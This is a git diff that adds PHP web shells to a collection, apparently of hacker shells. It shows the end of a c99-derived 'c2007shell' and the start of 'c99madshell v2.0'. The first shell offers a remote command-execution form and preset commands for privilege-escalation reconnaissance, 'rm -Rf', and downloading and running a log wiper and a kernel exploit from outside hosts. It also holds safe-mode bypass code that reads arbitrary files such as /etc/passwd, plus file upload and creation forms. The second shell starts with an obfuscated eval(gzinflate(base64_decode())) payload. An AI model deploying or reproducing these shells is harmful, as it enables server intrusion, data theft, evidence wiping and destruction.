+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". 
+"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". 
+"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". 
+"RYtMAgEAOw==", 
+"ext_cmd"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". 
+"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". 
+"dmrYAMn1onq/YKpjvEgAADs=", 
+"ext_cpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". 
+"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". 
+"Eq7YrLDE7a4SADs=", 
+"ext_ini"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". 
+"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". 
+"SnEjgPVarHEHgrB43JvszsQEADs=", 
+"ext_diz"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". 
+"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". 
+"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 
+"/+L//+7+/+v6/+/6/9H4/+X6/+Xl5Pz//+/t7fX08vD//+3///P///H///P7/8nq/8fp/8Tl98zr". 
+"/+/z9vT4++n1/b/k/dny/9Hv/+v4/9/0/9fw/8/u/8vt/+/09xUvXhQtW4KTs2V1kw4oVTdYpDZX". 
+"pVxqhlxqiExkimKBtMPL2Ftvj2OV6aOuwpqlulyN3cnO1wAAXQAAZSM8jE5XjgAAbwAAeURBYgAA". 
+"dAAAdzZEaE9wwDZYpmVviR49jG12kChFmgYuj6+1xeLn7Nzj6pm20oeqypS212SJraCyxZWyz7PW". 
+"9c/o/87n/8DX7MHY7q/K5LfX9arB1srl/2+fzq290U14q7fCz6e2yXum30FjlClHc4eXr6bI+bTK". 
+"4rfW+NXe6Oby/5SvzWSHr+br8WuKrQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjgACsJrDRHSICDQ7IMXDgJx8EvZuIcbPBooZwbBwOMAfMmYwBCA2sEcNBjJCMYATLIOLiokocm". 
+"C1QskAClCxcGBj7EsNHoQAciSCC1mNAmjJgGGEBQoBHigKENBjhcCBAIzRoGFkwQMNKnyggRSRAg". 
+"2BHpDBUeewRV0PDHCp4BSgjw0ZGHzJQcEVD4IEHJzYkBfo4seYGlDBwgTCAAYvFE4KEBJYI4UrPF". 
+"CyIIK+woYjMwQQI6Cor8mKEnxR0nAhYKjHJFQYECkqSkSa164IM6LhLRrr3wwaBCu3kPFKCldkAA". 
+"Ow==", 
+"ext_doc"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///8DAwAAA/4CAgAAAAAAAAAAAAANR". 
+"WErcrrCQQCslQA2wOwdXkIFWNVBA+nme4AZCuolnRwkwF9QgEOPAFG21A+Z4sQHO94r1eJRTJVmq". 
+"MIOrrPSWWZRcza6kaolBCOB0WoxRud0JADs=", 
+"ext_exe"=> 
+"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7". 
+"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt". 
+"xhIAOw==", 
+"ext_h"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANB". 
+"WLPc9XCASScZ8MlKCcARRwVkEAKCIBKmNqVrq7wpbMmbbbOnrgI8F+q3w9GOQOMQGZyJOspnMkKo". 
+"Wq/NknbbSgAAOw==", 
+"ext_hpp"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANF". 
+"WLPc9XCASScZ8MlKicobBwRkEAGCIAKEqaFqpbZnmk42/d43yroKmLADlPBis6LwKNAFj7jfaWVR". 
+"UqUagnbLdZa+YFcCADs=", 
+"ext_htaccess"=> 
+"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP8AAP8A/wAAgIAAgP//AAAAAAAAAAM6". 
+"WEXW/k6RAGsjmFoYgNBbEwjDB25dGZzVCKgsR8LhSnprPQ406pafmkDwUumIvJBoRAAAlEuDEwpJ". 
+"AAA7", 
+"ext_html"=> 
+"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz". 
+"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P". 
+"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk". 
+"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR". 
+"ADs=", 
+"ext_jpg"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci". 
+"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd". 
+"FxEAOw==", 
+"ext_js"=> 
+"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH". 
+"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs". 
+"a00AjYYBbc/o9HjNniUAADs=", 
+"ext_lnk"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAFAALAAAAAAQABAAhgAAAABiAGPLMmXMM0y/JlfFLFS6K1rGLWjO". 
+"NSmuFTWzGkC5IG3TOo/1XE7AJx2oD5X7YoTqUYrwV3/lTHTaQXnfRmDGMYXrUjKQHwAMAGfNRHzi". 
+"Uww5CAAqADOZGkasLXLYQghIBBN3DVG2NWnPRnDWRwBOAB5wFQBBAAA+AFG3NAk5BSGHEUqwMABk". 
+"AAAgAAAwAABfADe0GxeLCxZcDEK6IUuxKFjFLE3AJ2HHMRKiCQWCAgBmABptDg+HCBZeDAqFBWDG". 
+"MymUFQpWBj2fJhdvDQhOBC6XF3fdR0O6IR2ODwAZAHPZQCSREgASADaXHwAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeZgFBQPAGFhocAgoI7Og8JCgsEBQIWPQCJgkCOkJKUP5eYUD6PkZM5". 
+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+?> 
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Shadow's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Preddy's tricks :D </b></a> ::</b></p></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>
+   <b>..:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::..</b>
+   <form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>
+   <b>..:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::..</b>
+   <form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>..:: Make Dir ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>
+  <b>..:: Make File ::..</b>
+  <form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>
+  <b>..:: Go Dir ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>
+  <b>..:: Go File ::..</b>
+  <form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b><img src="../../My Documents/My Pictures/yes2.gif" width="42" height="30">--[ c2007shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Adora &amp; u9 h4c93r| <a href=""><font color="#FF0000">Adora Security Pwnz j00! </font></a> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b><img src="../../My Documents/My Pictures/yes2.gif" width="42" height="30"></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?>
diff --git a/xakep-shells/PHP/c99madshell_v2.0.php.php.txt b/xakep-shells/PHP/c99madshell_v2.0.php.php.txt
new file mode 100644
index 0000000..8d3afa4
--- /dev/null
+++ b/xakep-shells/PHP/c99madshell_v2.0.php.php.txt
@@ -0,0 +1,7 @@
+<?php
+             //Authentication
+$login = ""; //Login
+$pass = "";  //Pass
+$md5_pass = ""; //If no pass then hash
+eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXefMcFUL5EXf/yqceii7e8n9JvOYE9t8sT8cs//cfWUXldLpKsQ2LCH7EcnuYdrqeqDHEDz+4uJYWH3YLflGUnDJ40DjU/AL1miwEJPpBWlsAxTrgB46jRW/00XpggW00yDI/H1kD7UqxI/3qjQZ4vz7HLsfNVW1BeQKiVH2VTrXtoiaKYdkT4o/p1E8W/n5eVhagV7GanBn0U7OCfD7zPbCQyO0N/QGtstthqJBia5QJsR6xCgkHpBo1kQMlLt6u++SBvtw5KSMwtG4R2yctd0mBNrlB3QQo4aQKGRgRjTa0xYFw1vVM9ySOMd44sSrPeSG8JPyOyEpK+U0y8d4n2EzI9MDdnlMkLKQQ8ZIYPW3sF4lUFF9gO8AjT5ceta4HM7HkZi7S2yoAAPLD8D7Pn4kD6t1EIkHYORMtJBdqcseuvOO5HcoLJO4b5UENDkOEq25EeU3GFSPIGFBzJVwCzJ+KG8VOSwioKtYkBfa475CUIwdsd2UCyyIjzNcV1Qd9O7V5LLYSNRQVmxHk58dAQsHToc5po9kwIqw/hW7jSjN7DOxqpycbxRsWryNR1Rk/zW9H0SJC6YuDooqAb74a+JoAsnsNw3RXTOYnEXyrUypwzGj1mFxn4joUYcBpPKZFnhZduMJ3N+iJGv0jxauM6oyrlDbzOteU/HxgXvt+oAkr1f10Y+5qUWycE6pwbQ8H7wXaNVwgSOR32uZqe04M7our2o/LBaJAzymHcrv5fAck4wdz+3i0V+uKI0X0aPSSdkiL6Y6kX6oPgXzgZhzywXLbbWzgCbQU50FMMYZsMU3hMt8lTceW4tQybP1tleF8AmARZ8SE4R3YLqauuSz8YMVcZAqlYIMDXrNTyTNxOVWUgtMiinhJN3ZVlU5/9uNqLIlwxvkKjJT5u8giHlZLEPr42p7lKCUnNyKhDtPtsLCEynwLp9Q5o/0lEcX2R0PWt